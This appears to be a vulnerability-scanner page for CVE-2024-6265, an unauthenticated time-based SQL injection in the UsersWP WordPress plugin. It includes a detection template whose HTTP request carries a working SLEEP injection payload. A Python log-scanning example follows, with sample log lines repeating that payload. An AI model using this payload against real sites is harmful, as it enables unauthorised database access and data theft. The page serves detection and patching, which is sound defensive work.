UsersWP <= 1.2.10 - Unauthenticated SQL Injection
CVE-2024-6265
Verified
Description
UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress contains a time-based SQL injection caused by insufficient escaping of the 'uwp_sort_by' parameter in all versions up to 1.2.10. It lets unauthenticated attackers execute arbitrary SQL queries; exploitation requires the attacker to control the 'uwp_sort_by' parameter.
Severity
Critical
Published Date
February 6, 2026
Template Author
shivam kamboj
CVE-2024-6265.yaml
id: CVE-2024-6265

info:
  name: UsersWP <= 1.2.10 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WordPress contains a time-based SQL Injection caused by insufficient escaping of the 'uwp_sort_by' parameter in all versions up to 1.2.10, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires attacker to control the 'uwp_sort_by' parameter.
  remediation: |
    Update to version 1.2.11 or later.
  impact: |
    Attackers can extract sensitive database information by executing arbitrary SQL queries, leading to data breach.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6265
  metadata:
    verified: true
    max-request: 6
    publicwww-query: "/plugins/userswp/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,userswp,sqli,time-based,unauth,vkev

http:
  - raw:
      - |
        @timeout: 10s
        GET {{path}}?uwp_sort_by=display_name,(SELECT+SLEEP(6))_asc HTTP/1.1
        Host: {{Hostname}}
    payloads:
      path:
        - "/users/"
        - "/members/"
        - "/user-list/"
        - "/member-directory/"
        - "/directory/"
        - "/all-users/"
    attack: clusterbomb
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "duration>=6"
          - "status_code == 200"
          - 'contains_any(body, "uwp-users", "uwp_page", "wp-content/plugins/userswp")'
        condition: and
# digest: 4b0a0048304602210083b370da7d6774d11afc34aa8a76c9b47a52c51034fa22a0988641c08c4bb152022100d6c7b85923170542d0072ca61d4506ff0c963b1f3a15c1adb881bb8aee19799f:922c64590222798bb761d5b6d8e72950
Remediation Steps
Update to version 1.2.11 or later.
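A log check to run alongside the update, as an added example that is not part of the original page or the template author's work: it flags access-log requests whose `uwp_sort_by` value falls outside a strict allowlist, after URL decoding. The allowlist (letters, digits and underscores, inferred from the `display_name..._asc` shape in the template), the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate uwp_sort_by values are a field name plus a direction
# suffix (e.g. display_name_asc), so only letters, digits and underscores.
SAFE_SORT = re.compile(r"[A-Za-z0-9_]{1,64}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments typical of time-based probing; used only to grade severity.
SQL_HINT = re.compile(r"\b(select|sleep|benchmark|union)\b|[()]", re.I)

def inspect_line(line):
    """Return (value, severity) for a suspicious uwp_sort_by, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qs percent-decodes and turns '+' into a space, as PHP does.
    for value in parse_qs(query, keep_blank_values=True).get("uwp_sort_by", []):
        if SAFE_SORT.fullmatch(value):
            continue
        severity = "high" if SQL_HINT.search(value) else "review"
        return value, severity
    return None

def scan(lines):
    """Collect (client_ip, value, severity) for every flagged log line."""
    hits = []
    for line in lines:
        result = inspect_line(line)
        if result:
            hits.append((line.split(" ", 1)[0], *result))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Feb/2026:10:00:01 +0000] "GET /users/?uwp_sort_by=display_name_asc HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Feb/2026:10:00:05 +0000] "GET /members/?uwp_sort_by=display_name,(SELECT+SLEEP(6))_asc HTTP/1.1" 200 5098',
    '203.0.113.9 - - [06/Feb/2026:10:00:12 +0000] "GET /directory/?uwp_sort_by=display_name%2C%28SELECT%2BSLEEP%286%29%29_asc HTTP/1.1" 200 5098',
    '198.51.100.7 - - [06/Feb/2026:10:01:00 +0000] "GET /users/?uwp_sort_by=newer-first HTTP/1.1" 200 5120',
    '198.51.100.8 - - [06/Feb/2026:10:01:30 +0000] "GET /wp-login.php HTTP/1.1" 200 2100',
]

if __name__ == "__main__":
    for ip, value, severity in scan(SAMPLE_LOG):
        print(f"{severity:6} {ip:15} uwp_sort_by={value!r}")
```

A "review" hit is a value that breaks the allowlist without SQL markers; tune `SAFE_SORT` to the sort options your directory pages actually emit before alerting on it.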